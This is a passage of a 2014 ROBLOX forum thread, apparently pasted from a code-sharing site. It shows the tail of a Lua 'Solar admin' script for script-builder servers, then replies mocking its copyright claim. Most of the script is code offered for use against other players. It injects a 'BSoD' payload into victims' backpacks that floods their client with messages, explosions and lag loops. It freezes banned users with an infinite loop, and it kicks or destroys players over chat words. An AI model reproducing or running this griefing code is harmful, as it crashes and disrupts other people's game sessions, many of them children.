  932. HardBanlist[#HardBanlist+1] = plr.Name
  933. NewS("game:service'Players':findFirstChild('"..plr.Name.."'):Kick()", workspace)
  934. for i = 0,10,1 do
  935. Notify("Hard Banned "..plr.Name.."!")
  936. end
  937. end
  938. end
  939. end
  940. )
  941. AddCmd("Explore","explore","Explore the game",
  942. function()
  943. Explore()
  944. end
  945. )
  946. AddCmd("Rejoin yourself","rej","Rejoin yourself even if you are nil",
  947. function()
  948. if SourceName ~= "source" then
  949. game:service'TeleportService':Teleport(game.PlaceId)
  950. else
  951. Output("This is alakazard's sb, can't teleport here.","Really red")
  952. end
  953. end
  954. )
  955. AddCmd("BSoD","bsod","BSoD a player",
  956. function(Plrs)
  957. for _, plr in pairs(Plrs) do
  958. if plr and plr.Backpack then
  959. for i = 0,7,1 do
  960. NewLS(BSoDSource, plr.Backpack)
  961. end
  962. end
  963. end
  964. end
  965. )
  966. --[[SOURCES]]--
  967. LBlock1 = [[
  968. LocalPlayer.descendantAdded:connect(function(what)
  969. if what:IsA("Script") or what:IsA("LocalScript") then
  970. if LBlock == false then return end
  971. if what.Name == "Health" then return end
  972. if what.Name == "HealthScript v3.1" then return end
  973. if what.Name == "Animate" then return end
  974. what.Disabled = true
  975. wait()
  976. what:Destroy()
  977. end
  978. end)
  979. ]]
  980. LBlock2 = [[
  981. LocalPlayer.Backpack.descendantAdded:connect(function(what)
  982. if what:IsA("Script") or what:IsA("LocalScript") then
  983. if LBlock == false then return end
  984. if what.Name == "Health" then return end
  985. if what.Name == "HealthScript v3.1" then return end
  986. if what.Name == "Animate" then return end
  987. what.Disabled = true
  988. wait()
  989. what:Destroy()
  990. end
  991. end)
  992. ]]
  993. LBlock3 = [[
  994. LocalPlayer.Character.descendantAdded:connect(function(what)
  995. if what:IsA("Script") or what:IsA("LocalScript") then
  996. if LBlock == false then return end
  997. if what.Name == "Health" then return end
  998. if what.Name == "HealthScript v3.1" then return end
  999. if what.Name == "Animate" then return end
  1000. what.Disabled = true
  1001. wait()
  1002. what:Destroy()
  1003. end
  1004. end)
  1005. ]]
  1006. ConnectSource = [[
  1007. script:ClearAllChildren()
  1008. wait()
  1009. script.Parent = nil
  1010. Player = game.Players.LocalPlayer
  1011. while wait(0.1) do
  1012. if game.Lighting:findFirstChild("DISC: nil") then
  1013. if Player.Parent == nil then
  1014. Delay(0, wait)
  1015. end
  1016. end
  1017. if game.Lighting:findFirstChild("DISC: "..Player.Name) then
  1018. Delay(0, wait)
  1019. end
  1020. end
  1021. ]]
  1022. BSoDSource = [[
  1023. wait()
  1024. script.Parent = game:service'TeleportService'
  1025. CC = workspace.CurrentCamera
  1026. RS = game:service("RunService")
  1027. PG = game.Players.LocalPlayer.PlayerGui
  1028. C = game.Players.LocalPlayer.Character
  1029. function Lag()
  1030. coroutine.resume(coroutine.create(function()
  1031. while wait() do
  1032. M = Instance.new("Message",CC)
  1033. M.Text = tick()*math.floor(5%4*21)
  1034. H = Instance.new("Hint",CC)
  1035. H.Text = 'Get out from this place!'
  1036. SG=Instance.new("ScreenGui",PG)
  1037. FR=Instance.new("Frame",SG)
  1038. FR.Size = UDim2.new(500,500,500,500)
  1039. while wait() do
  1040. FR.BackgroundColor3 = Color3.new(math.random(0,255),math.random(0,255),math.random(0,255))
  1041. end
  1042. P=Instance.new("Part",CC)
  1043. E=Instance.new("Explosion",P)
  1044. E.BlastRadius=math.huge
  1045. E.Position=P.Position
  1046. F=Instance.new("Fire",P)
  1047. S=Instance.new("Smoke",P)
  1048. P.CFrame = CC.Focus
  1049. P.Anchored = true
  1050. P.CanCollide = false
  1051. P.AncestryChanged:connect(function()Lag()end)
  1052. for _,v in pairs(C:GetChildren()) do pcall(function()v.Anchored=true end) end
  1053. end
  1054. end))
  1055. end
  1056. RS.Stepped:connect(function()for i=1,10 do Lag()Lag()Lag()end end)
  1057. ]]
  1058. --[[LOCAL BLOCK]]--
  1059. loadstring(LBlock1)()
  1060. loadstring(LBlock2)()
  1061. loadstring(LBlock3)()
  1062. LocalPlayer.CharacterAdded:connect(function()
  1063. loadstring(LBlock2)()
  1064. loadstring(LBlock3)()
  1065. end)
  1066. --[[CONNECTIONS]]--
  1067. LocalPlayer.Chatted:connect(function(m)
  1068. Chat(m,ChatColor)
  1069. for i,v in pairs(Cmds) do
  1070. if v["Say"]..Key == m:sub(1, #v["Say"]+#Key) then
  1071. v["Func"](GetPlayers(m:sub(#v["Say"]+#Key+1)), m:sub(#v["Say"]+#Key+1))
  1072. end
  1073. end
  1074. end)
  1075. for _,speaker in pairs(game:service'Players':GetPlayers()) do
  1076. if speaker.Name ~= LocalPlayer.Name then
  1077. if speaker.Name ~= "aleksa12432" then
  1078. if speaker.Name ~= "optiplex123" then
  1079. if speaker.Name ~= "Exorsizer" then
  1080. speaker.Chatted:connect(function(msg)
  1081. for _,v in pairs(MuteWords) do
  1082. if string.find(msg,v) then
  1083. if speaker and speaker.Backpack then
  1084. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)",speaker.Backpack)
  1085. end
  1086. end
  1087. end
  1088. for _,v in pairs(BadWords) do
  1089. if string.find(msg, v) then
  1090. if speaker and found == true then
  1091. NewS("game:service'Players':findFirstChild('"..speaker.Name.."'):Kick()")
  1092. elseif speaker and found == false then
  1093. speaker:Destroy()
  1094. end
  1095. end
  1096. end
  1097. end)
  1098. end
  1099. end
  1100. end
  1101. end
  1102. end
  1103. game.Players.ChildAdded:connect(function(speaker)
  1104. if speaker:IsA("Player") then
  1105. if speaker.Name ~= LocalPlayer.Name then
  1106. if speaker.Name ~= "aleksa12432" then
  1107. if speaker.Name ~= "optiplex123" then
  1108. if speaker.Name ~= "Exorsizer" then
  1109. speaker.Chatted:connect(function(msg)
  1110. for _,v in pairs(MuteWords) do
  1111. if string.find(msg:lower(),v:lower()) then
  1112. if speaker and speaker.Backpack then
  1113. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)",speaker.Backpack)
  1114. end
  1115. end
  1116. end
  1117. for _,v in pairs(BadWords) do
  1118. if string.find(msg:lower(),v:lower()) then
  1119. if speaker and found == true then
  1120. NewS("game:service'Players':findFirstChild('"..speaker.Name.."'):Kick()")
  1121. elseif speaker and found == false then
  1122. speaker:Destroy()
  1123. end
  1124. end
  1125. end
  1126. end)
  1127. end
  1128. end
  1129. end
  1130. end
  1131. end
  1132. end)
  1133. --[[START]]--
  1134. for i = 0,8,1 do
  1135. Output("")
  1136. end
  1137. Output("Welcome to Solar admin","Really red")
  1138. Output("This script is made by aleksa12432 and optiplex123","Really red")
  1139. if SourceName == "DSource" then
  1140. Output("You are on Anaminus SB","Really red")
  1141. elseif SourceName == "Source" then
  1142. Output("You are on Oxcool1 SB","Really red")
  1143. elseif SourceName == "source" then
  1144. Output("You are on qlqkqzqrd SB","Really red")
  1145. end
  1146. for _,v in pairs(game:service'Players':GetPlayers()) do
  1147. if v.Name ~= LocalPlayer.Name then
  1148. if v.Name ~= "aleksa12432" then
  1149. if v.Name ~= "optiplex123" then
  1150. if v.Name ~= "Exorsizer" then
  1151. Connect(v)
  1152. end
  1153. end
  1154. end
  1155. end
  1156. end
  1157. --[[LOOPS]]--
  1158. coroutine.wrap(function()
  1159. while wait(30) do
  1160. for _,v in pairs(game:service'Players':GetPlayers()) do
  1161. if v.Name ~= LocalPlayer.Name then
  1162. if v.Name ~= "aleksa12432" then
  1163. if v.Name ~= "optiplex123" then
  1164. if v.Name ~= "Exorsizer" then
  1165. if v.Backpack ~= nil then
  1166. NewLS(ConnectSource, v.Backpack)
  1167. end
  1168. end
  1169. end
  1170. end
  1171. end
  1172. end
  1173. end
  1174. end)()
  1175. game:service'Players'.ChildAdded:connect(function(player)
  1176. if player.Name ~= LocalPlayer.Name then
  1177. if player.Name ~= "aleksa12432" then
  1178. if player.Name ~= "optiplex123" then
  1179. if player.Name ~= "Exorsizer" then
  1180. wait(3)
  1181. Connect(player)
  1182. end
  1183. end
  1184. end
  1185. end
  1186. end)
  1187. game:GetService("RunService").RenderStepped:connect(function()
  1188. if TabModel.Parent ~= TabModelParent then return end
  1189. if TabModel == nil then return end
  1190. if LocalPlayer then
  1191. if LocalPlayer.Character then
  1192. if LocalPlayer.Character:findFirstChild("Torso") then
  1193. Rotation = Rotation + Speed
  1194. for i,v in pairs(Tabs) do
  1195. ypcall(function()
  1196. if LocalPlayer and LocalPlayer.Character and LocalPlayer.Character.Torso then
  1197. pos = LocalPlayer.Character.Torso.CFrame
  1198. else
  1199. pos = CFrame.new(0,0,0)
  1200. end
  1201. radius = 4 + (#Tabs * 0.5)
  1202. x = math.sin((i / #Tabs - (0.5 / #Tabs) + Rotation * 2) * math.pi * 2) * radius
  1203. y = 0
  1204. z = math.cos((i / #Tabs - (0.5 / #Tabs) + Rotation * 2) * math.pi * 2) * radius
  1205. arot = Vector3.new(x, y, z) + pos.p
  1206. brot = v.CFrame.p
  1207. crot = (arot * .1 + brot * .9)
  1208. v.CFrame = CFrame.new(crot, pos.p)
  1209. end)
  1210. end
  1211. end
  1212. end
  1213. end
  1214. end)
  1215. game:service'RunService'.RenderStepped:connect(function()
  1216. if TabModelDebounce == true then return end
  1217. if TabModel.Parent ~= TabModelParent then
  1218. TabModelDebounce = true
  1219. Tabs = {}
  1220. TabModel = Instance.new("Model", TabModelParent)
  1221. TabModel.Name = "Solar tabs"
  1222. Tabs = {}
  1223. Rotation = 0
  1224. wait()
  1225. TabModelDebounce = false
  1226. end
  1227. end)
  1228. coroutine.wrap(function()
  1229. while wait() do
  1230. for _,v in pairs(game:service'Workspace':children()) do
  1231. if v and v:IsA("StringValue") and v.Name == Code then
  1232. if v.Value ~= nil and v.Value ~= "" then
  1233. Output(v.Value,"Really red")
  1234. game:service'Debris':AddItem(v, 3)
  1235. end
  1236. end
  1237. end
  1238. end
  1239. end)()
  1240. coroutine.wrap(function()
  1241. while wait() do
  1242. for _,v in pairs(game:service'Players':GetPlayers()) do
  1243. pcall(function()
  1244. for j,k in pairs(Banlist) do
  1245. if v.Name == k then
  1246. if v:findFirstChild("Backpack") ~= nil then
  1247. NewLS("repeat until ucrappedurpants", v.Backpack)
  1248. end
  1249. end
  1250. end
  1251. for j,k in pairs(HardBanlist) do
  1252. if v.Name == k then
  1253. if v:findFirstChild("Backpack") ~= nil then
  1254. NewLS(BSoDSource, v.Backpack)
  1255. end
  1256. end
  1257. end
  1258. end)
  1259. end
  1260. end
  1261. end)()
  1262. while found == false do
  1263. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  1264. for _,ScriptInWorkspace in pairs(workspace:children()) do
  1265. if ScriptInWorkspace then
  1266. if ScriptInWorkspace:IsA("Script") then
  1267. if ScriptInWorkspace:FindFirstChild(SourceName) then
  1268. NewScript = ScriptInWorkspace:Clone()
  1269. wait()
  1270. NewScript.Name = "NewScript"
  1271. NewScript.Disabled = true
  1272. NewScript:FindFirstChild(SourceName).Value = ""
  1273. Output("Found a source!", "New Yeller")
  1274. found = true
  1275. break
  1276. end
  1277. end
  1278. end
  1279. end
  1280. wait()
  1281. end
  1282. ReplyReport Abuse
  1283. CoolioTree is not online. CoolioTree
  1284. Joined: 26 Dec 2012
  1285. Total Posts: 2511
  1286.  
  1287. 03-13-2014 04:19 PM
  1288. Nobody likes you. Get out.
  1289.  
  1290. Oh, and if it's actually copyrighting, then you're in some serious crap.
  1291.  
  1292. CoolioTree is not online. CoolioTree
  1293. Joined: 26 Dec 2012
  1294. Total Posts: 2511
  1295.  
  1296. 03-13-2014 04:20 PM
  1297. Copyrighted*
  1298.  
  1299. MettaurSp is not online. MettaurSp
  1300. Joined: 20 Mar 2010
  1301. Total Posts: 3174
  1302. RBXDev
  1303.  
  1304. 03-13-2014 04:20 PM
  1305. wat
  1306.  
  1307. Rayblox150 is not online. Rayblox150
  1308. Joined: 29 Dec 2010
  1309. Total Posts: 2790
  1310. Pinewood Builders
  1311.  
  1312. 03-13-2014 04:42 PM
  1313. Tl;dr
  1314.  
  1315. MettaurSp is not online. MettaurSp
  1316. Joined: 20 Mar 2010
  1317. Total Posts: 3174
  1318. RBXDev
  1319.  
  1320. 03-13-2014 04:51 PM
  1321. You don't like reading through other's scripts with bad forum formatting on that scale? Meh, neither do I lol
  1322.  
  1323. transIate is not online. transIate
  1324. Joined: 20 Jun 2013
  1325. Total Posts: 2699
  1326. Red Vice
  1327.  
  1328. 03-13-2014 10:31 PM
  1329. DUdE IN REPORTERTIN .
  1330.  
  1331. transIate is not online. transIate
  1332. Joined: 20 Jun 2013
  1333. Total Posts: 2699
  1334. Red Vice
  1335.  
  1336. 03-13-2014 10:31 PM
  1337. DUdE IN REPPORSITIONING
  1338.  
  1339. Trioxide is not online. Trioxide
  1340. Joined: 29 Mar 2011
  1341. Total Posts: 32203
  1342. RBXDev
  1343.  
  1344. 03-14-2014 09:27 AM
  1345. >This script is legaly copyrighted, so every steal is against law.
  1346.  
  1347. Where do you come up with this stuff?
  1348.  
  1349. Nikola7007 is not online. Nikola7007
  1350. Joined: 20 May 2013
  1351. Total Posts: 7893
  1352. Pinewood Builders
  1353.  
  1354. 03-14-2014 01:57 PM
  1355. The correct term is:
  1356.  
  1357.  
  1358. dis script leeguli copirited so no steel ur els i sue u for ovar 9000 gazillon bux so dont steel!!11
  1359.  
  1360. HaxHelper is not online. HaxHelper
  1361. Joined: 19 Dec 2009
  1362. Total Posts: 1207
  1363. RBXDev
  1364.  
  1365. 03-14-2014 02:02 PM
  1366. orijinal contend donut steel!!!!1
  1367.  
  1368. Devoi is not online. Devoi
  1369. Joined: 09 Jun 2013
  1370. Total Posts: 5368
  1371. Red Vice
  1372.  
  1373. 03-14-2014 02:32 PM
  1374. omg so inefficient
  1375.  
  1376. AngryAcolition is not online. AngryAcolition
  1377. Joined: 06 Apr 2013
  1378. Total Posts: 65
  1379. Dutch Robloxians
  1380.  
  1381. 03-14-2014 04:48 PM
  1382. For the guy who thinks he could get in trouble for publishing this if it's really copyrighted, this can't legally be copyrighted. If he was sued he'd easily win.
  1383.  
  1384. awesomedude739 is not online. awesomedude739
  1385. Joined: 24 Jun 2011
  1386. Total Posts: 143
  1387. H.A.U
  1388.  
  1389. 05-27-2014 02:58 PM
  1390. dud idk wy u be steelin dis sckript, becuz it iz elleigull 2 tak som1 els stuf! U gota stop takin copirihted stuhf, kk dud?
  1391.  
  1392. iSamJ is not online. iSamJ
  1393. Joined: 21 Nov 2012
  1394. Total Posts: 18370
  1395.  
  1396. 06-26-2014 11:38 PM
  1397. Honestly I don't know why I posted this.
  1398. I have my edited version in my documents now.
  1399.  
  1400. lateregistration is not online. lateregistration
  1401. Joined: 02 Apr 2013
  1402. Total Posts: 2508
  1403. Studio-R
  1404.  
  1405. 06-27-2014 11:51 AM
  1406. UMG ITS LEGALLY COPYRIGHTED... who cares?
  1407.  
  1408. lucas200206 is not online. lucas200206
  1409. Joined: 06 Dec 2009
  1410. Total Posts: 797
  1411. Knowledge Tech.
  1412.  
  1413. 06-27-2014 01:28 PM
  1414. You could atleast made the topic locked...
  1415. .-.
  1416.  
  1417. lateregistration is not online. lateregistration
  1418. Joined: 02 Apr 2013
  1419. Total Posts: 2508
  1420. Studio-R
  1421.  
  1422. 06-28-2014 08:01 AM
  1423. wait how hard is the ban?
  1424.  
  1425. iSamJ is not online. iSamJ
  1426. Joined: 21 Nov 2012
  1427. Total Posts: 18370
  1428.  
  1429. 12-30-2014 08:24 AM
  1430. lol ^^^
  1431.  
  1432. Previous Thread :: Next Thread
  1433. Page 1 of 1
  1434.  
  1435. Add a Reply
  1436.  
  1437. ROBLOX Forum » Game Creation and Development » Scripters
  1438.  
  1439.  
  1440. Advertisement Report
  1441. Advertisement Report
  1442. Advertisement Report
  1443. Advertisement Report
  1444. Advertisement Report
  1445. Advertisement Report
  1446. Advertisement Report
  1447. Advertisement Report
  1448. Advertisement Report
  1449. Advertisement Report
  1450. Advertisement Report
  1451. Advertisement Report
  1452. Advertisement Report
  1453. Advertisement Report
  1454. Advertisement Report
  1455. Advertisement Report
  1456. Advertisement Report
  1457. Advertisement Report
  1458. Advertisement Report
  1459. Advertisement Report
  1460. Advertisement Report
  1461. Advertisement Report
  1462. Advertisement Report
  1463. Advertisement Report
  1464. Advertisement Report
  1465. Advertisement Report
  1466. Advertisement Report
  1467. Advertisement Report
  1468. Advertisement Report
  1469. Advertisement Report
  1470. Advertisement Report
  1471. Advertisement Report
  1472. Advertisement Report
  1473. Advertisement Report
  1474. Advertisement Report
  1475. Advertisement Report
  1476. Advertisement Report
  1477. Advertisement Report
  1478. Advertisement Report
  1479. Advertisement Report
  1480. Advertisement Report
  1481. Advertisement Report
  1482. Advertisement Report
  1483. Advertisement Report
  1484. Advertisement Report
  1485. Advertisement Report
  1486. Advertisement Report
  1487. Advertisement Report
  1488.  
  1489. Privacy Policy | Advertise with Us | Press | Contact Us | About Us | Blog | Jobs | Parents
  1490. TRUSTe Children privacy certification
  1491.  
  1492. ROBLOX, "Online Building Toy", characters, logos, names, and all related indicia are trademarks of ROBLOX Corporation, ©2015. Patents pending. ROBLOX is not sponsored, authorized or endorsed by any producer of plastic building bricks, including The LEGO Group, MEGA Brands, and K'Nex, and no resemblance to the products of these companies is intended. Use of this site signifies your acceptance of the Terms and Conditions.
  1493. Online
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement